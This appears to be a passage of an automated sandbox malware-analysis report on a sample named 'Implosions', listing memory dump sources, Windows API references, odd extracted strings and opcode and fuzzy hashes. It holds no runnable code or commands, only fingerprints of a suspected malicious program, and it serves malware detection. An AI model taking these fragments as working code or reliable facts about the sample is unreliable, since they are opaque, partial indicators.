              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c81c21bd4c04c90f3c2aa34d0ce83e25b97ac75af3e72c673646babc99acdec4
              • Instruction ID: deff4e4a71bb377fa4e52cce38798a381868ac230f0476886476888b38c2b38d
              • Opcode Fuzzy Hash: c81c21bd4c04c90f3c2aa34d0ce83e25b97ac75af3e72c673646babc99acdec4
              • Instruction Fuzzy Hash: FA22BB35B003059FC715AB799858A6EBFE6FF84204F148869E90ADB391DF34ED06CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8a6658d651034b82c0d118430164f2a7894b8640060afb006b21965c3c9b3a4
              • Instruction ID: f600866769596f46dab4f04433fc3143871ca8db01488dd7b1b84699b851dac0
              • Opcode Fuzzy Hash: e8a6658d651034b82c0d118430164f2a7894b8640060afb006b21965c3c9b3a4
              • Instruction Fuzzy Hash: AE125930A103158FDB25EF68C854B9ABBB2FF84304F148599E849AB355DB71ED86CF90
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
              • String ID:
              • API String ID: 2598563909-0

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: \s^q$\s^q$\s^q$\s^q$\s^q$\s^q$\s^q
              • API String ID: 0-1705958294

              Control-flow Graph

              APIs
              • lstrlenA.KERNEL32(?), ref: 00401906
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
              • GetLastError.KERNEL32 ref: 00401940
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: ByteCharMultiWide$ErrorLastlstrlen
              • String ID:
              • API String ID: 3322701435-0

              Control-flow Graph

              APIs
              • _malloc.LIBCMT ref: 0040AF80
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
              • String ID:
              • API String ID: 1411284514-0

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q
              • API String ID: 0-2697143702

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq$(bq
              • API String ID: 0-4224401849
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: ,7bq
              • API String ID: 0-2588767232
              APIs
              • GetConsoleWindow.KERNELBASE ref: 021B110F
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID: ConsoleWindow
              • String ID:
              • API String ID: 2863861424-0
              APIs
              • GetConsoleWindow.KERNELBASE ref: 021B110F
              Memory Dump Source
              • Source File: 00000000.00000002.2910396162.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_21b0000_Implosions.jbxd
              Similarity
              • API ID: ConsoleWindow
              • String ID:
              • API String ID: 2863861424-0
              APIs
                • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
              • SysAllocString.OLEAUT32 ref: 00401898
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AllocString_malloc
              • String ID:
              • API String ID: 959018026-0
              APIs
              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `_q
              • API String ID: 0-2041170535
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: Hbq
              • API String ID: 0-1245868
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `;bq
              • API String ID: 0-1117088481
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: c135a806ee047048984f86af190694805cc8940a694e845be146e2ab8be90134
              • Instruction ID: fda1fa10b3b6a6a2f97fac5d309af220405c0c5e656a70e9aff39c24a56b82b0
              • Opcode Fuzzy Hash: c135a806ee047048984f86af190694805cc8940a694e845be146e2ab8be90134
              • Instruction Fuzzy Hash: 7B51BE31B00616AFCB15EF68D8809AEFBB2FF84354B15866AD459DB391DB30BC418BD0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `;bq
              • API String ID: 0-1117088481
              • Opcode ID: d31d4738a233dd79d1ff3e8468ac3a5d042d2af4af7cd31f99acfa802a1101b0
              • Instruction ID: fd2c0186ac01923d844f49db49e72cb1cf875c6a47df9834be562806103f467c
              • Opcode Fuzzy Hash: d31d4738a233dd79d1ff3e8468ac3a5d042d2af4af7cd31f99acfa802a1101b0
              • Instruction Fuzzy Hash: 8E21A131214301AFD715EB68D5907DEBAA7EF80340F908E38C0168B765DFB1B98D8BA0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: LR^q
              • API String ID: 0-2625958711
              • Opcode ID: db14f0691168fd3f2c13af3f368f5df3f8cc3c69a53ef2c9cd98ba646d3e26d4
              • Instruction ID: b1ef4d7288f9f400c08171f19e5416d41e120a1ca0d4741ce4ecf1b1c533fc72
              • Opcode Fuzzy Hash: db14f0691168fd3f2c13af3f368f5df3f8cc3c69a53ef2c9cd98ba646d3e26d4
              • Instruction Fuzzy Hash: 7C21F1363001068BEB04DA66D094B3A7BE7FBC4A8CF14C529D50AAB384DA30DD02C7C6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 5105a62726a66bdc45ce4ab9290a39c2256c88f45a517d5515914f9495dfc723
              • Instruction ID: 9002d0b86d98c74c1fabb763279641d8bfff4d2f343c08499a60b0d175e2ce8a
              • Opcode Fuzzy Hash: 5105a62726a66bdc45ce4ab9290a39c2256c88f45a517d5515914f9495dfc723
              • Instruction Fuzzy Hash: 82314D312006059FC725EF28E994A9ABBB2FF843047509E2DE4464BB64DB71FD49CB91
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              • Opcode ID: 9c79060ab5052e980eb1fdb3a9fd713aa1be86ad2aa71a8d9cb0d2acadb5efb6
              • Instruction ID: 7f0bcfea1c2252d271c67094ca34a1756205ead0f7b13b5d98feb9ab1c89bcd9
              • Opcode Fuzzy Hash: 9c79060ab5052e980eb1fdb3a9fd713aa1be86ad2aa71a8d9cb0d2acadb5efb6
              • Instruction Fuzzy Hash: 7E219F30B10305AFDB58AF78902477E3BE6BF84200B64456DE906CB381EE35ED01CB50
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              • Opcode ID: 3606f9abbdfd34003e0a886ed43ec1f5ede5f798c9cddef20182894081b6676e
              • Instruction ID: 3c5a9dafa9795da91ab1a45e4e45705e297502a549774fc6450aac172544636c
              • Opcode Fuzzy Hash: 3606f9abbdfd34003e0a886ed43ec1f5ede5f798c9cddef20182894081b6676e
              • Instruction Fuzzy Hash: 1E212131B093919FC3159B399454A2ABFF6EFC2250B5881ABE845DB385EB34DC02C790
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              • Opcode ID: 4c774d3529eeafe7fd707712f7f8779c668f778bb2381f4f8faf27aafcb625fe
              • Instruction ID: 7af2f68f99918ace9bc112faa3e7804a6d1db9cac4c81912904d9a8afc03e477
              • Opcode Fuzzy Hash: 4c774d3529eeafe7fd707712f7f8779c668f778bb2381f4f8faf27aafcb625fe
              • Instruction Fuzzy Hash: 2C219F30E103499FDB05EFA4D4947AEBBB6FF85340F608829E506AB294DF706905CB94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: b0d6a21f9f3632e9e0bc70f32afd90550fadf86a904e0b89414bee8f963df823
              • Instruction ID: d56b7d0e48a5fa62e98efb1995a1d4b652077cc148972efe7c0a6641f3a78549
              • Opcode Fuzzy Hash: b0d6a21f9f3632e9e0bc70f32afd90550fadf86a904e0b89414bee8f963df823
              • Instruction Fuzzy Hash: A20179312546069FC720DB2CD980A9AB7A6FFC0710B509B3590558B7A9DB70F9498B90
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fcb70a65b701be7259bb4c5758567565bc4217f38ded09bec6bc44e241cfc64
              • Instruction ID: 75a41030eec92b52feea7f812982e589a7c8b0c9ba42dca644b963cbdabc5b9e
              • Opcode Fuzzy Hash: 6fcb70a65b701be7259bb4c5758567565bc4217f38ded09bec6bc44e241cfc64
              • Instruction Fuzzy Hash: FB124870A003059FDB15EF64D494AADBBB2FF84300F549A69D4059F36ADB74EC89CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2c6be2c18a4ca5fe018c04ad8cbef8cd0187207d534a18ac33c4cb8bed43323
              • Instruction ID: bb961cf23f647936b662ca37685084260271f29eff882cfaf67020f4b276b62c
              • Opcode Fuzzy Hash: e2c6be2c18a4ca5fe018c04ad8cbef8cd0187207d534a18ac33c4cb8bed43323
              • Instruction Fuzzy Hash: B1123870A003069FDB15EF64D894AADBBB2FF84300F549A69D4055F36ADB74EC89CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18f1b9479da7e87adbb9d49e3ec260a6b7a3a3b129b80a159dd08770b6e428c0
              • Instruction ID: c2a34e52e5f20a994d8ed594240c0e9805e553229fa9444b3f1c461dae220ebc
              • Opcode Fuzzy Hash: 18f1b9479da7e87adbb9d49e3ec260a6b7a3a3b129b80a159dd08770b6e428c0
              • Instruction Fuzzy Hash: F9E10831A00206DFDB14DFA4D498AADBBF2FF44308F508868E416AF7A5DB75AD85CB40
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 28f5bb1133ff5f0733c816364bb9b39728fd988da5c7bb2962803c1dd7e2a989
              • Instruction ID: 7567cb475f7fb2c64d6eb873bfa32b26f07d53e06a8615fb7c9f9d4ca256a067
              • Opcode Fuzzy Hash: 28f5bb1133ff5f0733c816364bb9b39728fd988da5c7bb2962803c1dd7e2a989
              • Instruction Fuzzy Hash: ECD13770A00205DFDB14EF64D994AAEF7B2FF84300F549A69D405AB365DB70ED8ACB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: efd44167e2363f3a80b962462985608d4171a4c6b638439d84b48fc8afb77744
              • Instruction ID: ecda0faac1f69b2ca0772012e5f10fb256cdd0f74e4266eaa823025d71021735
              • Opcode Fuzzy Hash: efd44167e2363f3a80b962462985608d4171a4c6b638439d84b48fc8afb77744
              • Instruction Fuzzy Hash: 83A1CD31B086118FCB69DB69D498B6DB7E2FF84310B058869D806EB365DBB1ED41CBD0
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af4e540273291f3296ff98e4a451dcaee12c81ba699cf60bbf03e6cf960da21a
              • Instruction ID: f9dfa48abd813857fd13e2f644b2d7155687a2dbbad7e2e5be7ac9382a7b9ed6
              • Opcode Fuzzy Hash: af4e540273291f3296ff98e4a451dcaee12c81ba699cf60bbf03e6cf960da21a
              • Instruction Fuzzy Hash: 96B14574A00205CFCB19DF69D584AAEBBF2FF88314F148969E8169B351DB34ED85CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54a4dcef94a082001f885e40638c7162e1bd7a50abbff3e20f568516d76f071a
              • Instruction ID: b2a020bc96594212979cf41854a879041571155cd4ea1bb15333631db117a289
              • Opcode Fuzzy Hash: 54a4dcef94a082001f885e40638c7162e1bd7a50abbff3e20f568516d76f071a
              • Instruction Fuzzy Hash: C4B14934A20345CFDB25EF68D589B6DBBB2BF44301F14856AE4469B361EB34EC86CB50
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 509fa21d7c169de98996d048406a2b3eb9450c75f5e4a56ac3e71aa7f3a39f96
              • Instruction ID: 253b606c862c109942d1c046d2bf703108f5ea94eecb38ab4e4d9b7a1da29747
              • Opcode Fuzzy Hash: 509fa21d7c169de98996d048406a2b3eb9450c75f5e4a56ac3e71aa7f3a39f96
              • Instruction Fuzzy Hash: 56A1C4306047468FC725EB39D554AAABBF2FF88300B548A2AD4468BB55DF30FC49CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3eadbbf1cd2febe731f4084be9fa8268ee7ff409f5023151b9bcc5c0771a72b
              • Instruction ID: 29e2003ae07d60594534762f71ba9ce44937a2f3a8fb1ffa4be9f4ea7fc21014
              • Opcode Fuzzy Hash: a3eadbbf1cd2febe731f4084be9fa8268ee7ff409f5023151b9bcc5c0771a72b
              • Instruction Fuzzy Hash: E9B12D30A1061ADBEB14EF64D855B9DBB72FF44300F50869AE84AA7250DF74AE85CF90
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9fb489d6afc03ac740845097bda995d37319610b51e822ea4f536ffe2fa19a0
              • Instruction ID: a4ab07ec8f803e2241780c70c5fe3043f035637000a8bb4411c75b9210f07c6a
              • Opcode Fuzzy Hash: a9fb489d6afc03ac740845097bda995d37319610b51e822ea4f536ffe2fa19a0
              • Instruction Fuzzy Hash: 42A15134A10209CFCB04DFA8D594A9DBBB2FF88314F158569E806AB365DB71ED46CF90
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7aa1957581d743b2f23269d88a8aaba6649c6f488884c686aa82cbe13e140b05
              • Instruction ID: 5212d96488b42427e588a62aecc236067e3552bd19e933e64741ac59d2fef1e9
              • Opcode Fuzzy Hash: 7aa1957581d743b2f23269d88a8aaba6649c6f488884c686aa82cbe13e140b05
              • Instruction Fuzzy Hash: A5913C34710205CFDB08DF69C498AAA7BE6FF88304F15816AE506DB3A5DB35EC42CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07a661ab8105e5fee3e7ac6220391367e341c7e8b8a5b1733e7cde69f0266ce5
              • Instruction ID: 177136d508d0c31eeb63a92dbe3cb35bfcfe59d9a5a39bc34ca2966224859303
              • Opcode Fuzzy Hash: 07a661ab8105e5fee3e7ac6220391367e341c7e8b8a5b1733e7cde69f0266ce5
              • Instruction Fuzzy Hash: EE812834A012099FDB14CFA9D554BADBBF2BF88300F14846AE846EB365DB35E945CB50
              Memory Dump Source
